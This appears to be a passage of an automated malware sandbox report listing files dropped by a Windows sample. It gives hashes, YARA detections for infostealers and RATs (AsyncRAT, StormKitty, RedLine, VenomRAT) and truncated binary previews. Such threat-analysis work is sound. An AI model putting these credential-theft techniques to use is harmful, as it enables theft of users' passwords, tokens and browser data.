Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........g...N..........(L...............................................(p.....(.....s ...z.z.,..{$...,..{$...o......(....s.....%....s.........(.....(E...Z.~....~(...o+...(@...j~'...o+...('...(P...(\....s...../....(S....(-...~r...p(.....3...r...p(.....4...rsJ....5...~5.....oK....6...b~8...,.~8...o......8....(....-..........s.....o....(.......P...s....(....tk...(.... ....(....~r...p(.....J...r...p(.....K.....(...+.o^...-....(...+oh....K...J.o....%(....

C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	179200
Entropy (8bit):	5.896878165133799
Encrypted:	false
SSDEEP:	3072:ge8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gTWwARE+WpCc:06ewwIwQJ6vKX0c5MlYZ0b27
MD5:	68FAD5F5F8DE1C290DF5D3754B4AF358
SHA1:	0028395243F38A03B13726915144B9848E8DA39A
SHA-256:	DBACC134902EE72D1464D3B61A3518402B7AB54807BB7B7541FC2916C8119E9E
SHA-512:	CE44611D5C47FDCB979C715352F5050C816D4E5A814B102836856EDE279F774E4709CA48FB95639CA66476CA547176370DA7AFC5185AF066832732DA2C80EE01
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 74%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w.f................................. ........@.. ....................... ............`.................................l...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........C...........................................................................r...p..................................6.r...p.o.................."..s^......>..sf...%.}"..........0..........s..........o.....o......0..........s..........o.....o.......sV...2.o....sR......2.o....sL.......0../.......#..........o.... ....(......(....,..#.........N...(....(....o....".o"...i...&..lo#.....".o"...k...&..lo#......0.."..........o......(....,...

C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	179200
Entropy (8bit):	5.896878165133799
Encrypted:	false
SSDEEP:	3072:ge8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gTWwARE+WpCc:06ewwIwQJ6vKX0c5MlYZ0b27
MD5:	68FAD5F5F8DE1C290DF5D3754B4AF358
SHA1:	0028395243F38A03B13726915144B9848E8DA39A
SHA-256:	DBACC134902EE72D1464D3B61A3518402B7AB54807BB7B7541FC2916C8119E9E
SHA-512:	CE44611D5C47FDCB979C715352F5050C816D4E5A814B102836856EDE279F774E4709CA48FB95639CA66476CA547176370DA7AFC5185AF066832732DA2C80EE01
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 74%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w.f................................. ........@.. ....................... ............`.................................l...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........C...........................................................................r...p..................................6.r...p.o.................."..s^......>..sf...%.}"..........0..........s..........o.....o......0..........s..........o.....o.......sV...2.o....sR......2.o....sL.......0../.......#..........o.... ....(......(....,..#.........N...(....(....o....".o"...i...&..lo#.....".o"...k...&..lo#......0.."..........o......(....,...

C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	328192
Entropy (8bit):	5.78991211597484
Encrypted:	false
SSDEEP:	6144:Cm/Q1Q5Ng68j/svmHC40+XIzFUygWK0tWrcBOvx:Cm/Q6P8j/svm1TXI5tZB
MD5:	43F955115DFBA87CA3593A18EFD58CEF
SHA1:	A1CA1FD8976E6A50CA3FE59994DAEB0F8A7F9DE5
SHA-256:	1D16C42501F0040B2CFCD9E6138DB1311D7ED64C8F7C8F415176065B64F4B674
SHA-512:	360B070901D19B67FCB70260D54C8A8FE65C5720FE0E0C170F6C71D29999EB95B995EFB1BC3DB6CC2A33989B2CBF44F879E00535F27591184625A62AB2641DCD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 92% Antivirus: Virustotal, Detection: 66%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.b.........."...0.................. ... ....@.. .......................`............`.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......t...XZ...........................................................@.o..qw.y.pO r.P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........

C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	48640
Entropy (8bit):	5.555815017949639
Encrypted:	false
SSDEEP:	768:xuwpFTAY3IQWUe9jqmo2qLPYT87XPUpDKcMRPIXB140bxYEEggal46E4bIAnnMWu:xuwpFTA4/2lgXMMOXbzbxY9ggd6DbIAS
MD5:	C709136E78750FEB6CB85F99EDA16629
SHA1:	FC92BE55DCE55098824E381EDEC2002287BB8042
SHA-256:	D77EE327A52A472BC309A79DB27B82F133C2F7B4DDAE689CC130EBE407752FD3
SHA-512:	7E92EE4B23E9ECFC97C259F7572DCB818CC6A77DBF02B693F58249926A8ED6C324B5CA641BA0C68DB0B063BF966C8651EB82DE9AA2B46446FEA238FA255F27D6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: ditekSHen
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-e............................N.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........Y...v.............................................................V..;...$0.xC.=VD..b......9A../.\.....(.....~............~............~............~............~............~............~............~.....~............~............~............(>......2~.....o?....s..........()...:(...(...:....(+...:....('...:....((...9.....(v...V(....s.... ...o....n~....9....~....o..........~~....(....9....(0...9....(@...VrN%.p~....(o....#....s...

C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	48640
Entropy (8bit):	5.555815017949639
Encrypted:	false
SSDEEP:	768:xuwpFTAY3IQWUe9jqmo2qLPYT87XPUpDKcMRPIXB140bxYEEggal46E4bIAnnMWu:xuwpFTA4/2lgXMMOXbzbxY9ggd6DbIAS
MD5:	C709136E78750FEB6CB85F99EDA16629
SHA1:	FC92BE55DCE55098824E381EDEC2002287BB8042
SHA-256:	D77EE327A52A472BC309A79DB27B82F133C2F7B4DDAE689CC130EBE407752FD3
SHA-512:	7E92EE4B23E9ECFC97C259F7572DCB818CC6A77DBF02B693F58249926A8ED6C324B5CA641BA0C68DB0B063BF966C8651EB82DE9AA2B46446FEA238FA255F27D6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: ditekSHen
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-e............................N.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........Y...v.............................................................V..;...$0.xC.=VD..b......9A../.\.....(.....~............~............~............~............~............~............~............~.....~............~............~............(>......2~.....o?....s..........()...:(...(...:....(+...:....('...:....((...9.....(v...V(....s.... ...o....n~....9....~....o..........~~....(....9....(0...9....(@...VrN%.p~....(o....#....s...

C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64512
Entropy (8bit):	5.821041922848356
Encrypted:	false
SSDEEP:	1536:QhB5LrUwk4XO01VIqREWN6y3TbbhwsJaJcGODpqKmY7:QhB5LrUwk4XVVIqRfTbbh1Jacgz
MD5:	E52BA92D25281E90AA7F27BD3719951F
SHA1:	F67B856DBAC5BDD315DCE1DF2738A1B4F88F4F39
SHA-256:	8215ED905544D217F656B5B226F71798970698EEFA4F24CB48532778D8409BAA
SHA-512:	96A3E30A0FBE049F69B07155CFE3E1A431FF63E8DABC4BAA13EADA61668EBC4D4171FDAF70FB7FAC4D92FC7E8383FA400DCF11EEAEE98E47511857E30A23F53D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, Author: ditekSHen
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7Hb................................. ... ....@.. .......................`............@.................................H...S.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........e..h............................................................W......H3.......W......3........./.\.....(.....~............~............~............~............~............~............~............~.....~............~............~............(C......2~.....oD....s....%r...po....(h...r...p(....o....o....o....( ... ....(.....s....%r...po....r...po....%r...po.....o....o....( ...Vs.........si.........~"......"...F.(+...~!...o....*&...o.

C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	307712
Entropy (8bit):	5.0811597359684715
Encrypted:	false
SSDEEP:	3072:ScZqf7D34Tp/0+mAQkyg91Q0gvxiB1fA0PuTVAtkxz+3RkeqiOL2bBOA:ScZqf7DItnTyFiB1fA0GTV8kEML
MD5:	7081E613321921500B70899FDDB56A4D
SHA1:	FBB9EF6899FB0EA1999404CCFF08EE61CA8DE11F
SHA-256:	7C03173D3BD7A27E446D8FE70829B963942F746D933A9EAB4D198D524B45CB68
SHA-512:	679431A866A9806E967515EB97905D458798D8D9832A6FD57E519B12F5A8A5E8331297331A84C95A43BFCA5953987AE9248638BC084FDA92471540919A76A72C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................4...W.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

C:\Users\user\AppData\Local\Temp\SystemUpdate.exe

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	238080
Entropy (8bit):	5.990664364126582
Encrypted:	false
SSDEEP:	6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaP:DIQRG6Y4ziBl4Ud
MD5:	839B3EFD5782B6FC122855665F3AA202
SHA1:	067C1B809106A1B9AD1641A9C745D4B83ECE1196
SHA-256:	91EBCD79CFCBFEDDA3C557C5BB1EE5DA9F4D13D518491D22A0E92F2CAAB7BEC0
SHA-512:	1ABFA3908386A7E579837548978CE0BAC26CC2D9F3194EF652D2CE9810BBED84130D9CDDABDC100256A118E362A33D0933DF3511745F75DE06C8DFA2BB88FFE4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TH1F9B.tmp

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	data
Category:	modified
Size (bytes):	15088640
Entropy (8bit):	0.5435640710844427
Encrypted:	false
SSDEEP:	3:flXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXl:
MD5:	52D46BE6BB8DC6D8FD09925E84A76994
SHA1:	2639980AA48B17EE9FDC169872703453C8E73DEB
SHA-256:	03B152B94FC40A782D7E12D58AD1D6B00B1029757811F841F64FDBD4831E694B
SHA-512:	3EA9EFD5CBD44185EE2709A2CA787E8981FD5DE1C757890F1636C9C79624203ABDB341B9E0075A51733286AEC963043EC2A2AC6651EC9BBA043CDF81B32FD0C4
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TH7F.tmp

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	data
Category:	modified
Size (bytes):	15088640
Entropy (8bit):	0.5435640710844427
Encrypted:	false
SSDEEP:	3:flXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXl:
MD5:	52D46BE6BB8DC6D8FD09925E84A76994
SHA1:	2639980AA48B17EE9FDC169872703453C8E73DEB
SHA-256:	03B152B94FC40A782D7E12D58AD1D6B00B1029757811F841F64FDBD4831E694B
SHA-512:	3EA9EFD5CBD44185EE2709A2CA787E8981FD5DE1C757890F1636C9C79624203ABDB341B9E0075A51733286AEC963043EC2A2AC6651EC9BBA043CDF81B32FD0C4
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_deoscgxg.g4s.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbv21qz3.r33.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Download File

Process:	C:\Users\user\AppData\Roaming\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	327680
Entropy (8bit):	5.792289043356197
Encrypted:	false
SSDEEP:	6144:9y/Q1Q5Ng68j/svvi/0KOFUygWK0tWrcBOvZ:9y/Q6P8j/svv40tZB
MD5:	C28490DA01887AA59D82C54B576DC107
SHA1:	5C4A2F7A85B686F5767A618D69ADB20367381BDD
SHA-256:	BC07B9C79B5CD67DBCE8031E5A39E8987494A6185E20F589964020E14FF3E789
SHA-512:	770835B7AC65B090478B233AA5008557FA447961445558BBBC7CC900B5CB29E1DED2F8E0B318E996E410686B9054F83C1ACE710DE54E8FD039965C4CB110D2C2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.b.........."...0.............~.... ... ....@.. .......................`............`.................................(...S.... ..~....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...~.... ......................@..@.reloc.......@......................@..B................`.......H.......t....Y...........................................................@.o..qw.y.pO r.P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........

C:\Users\user\AppData\Local\Temp\places.raw

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1126.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1732.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
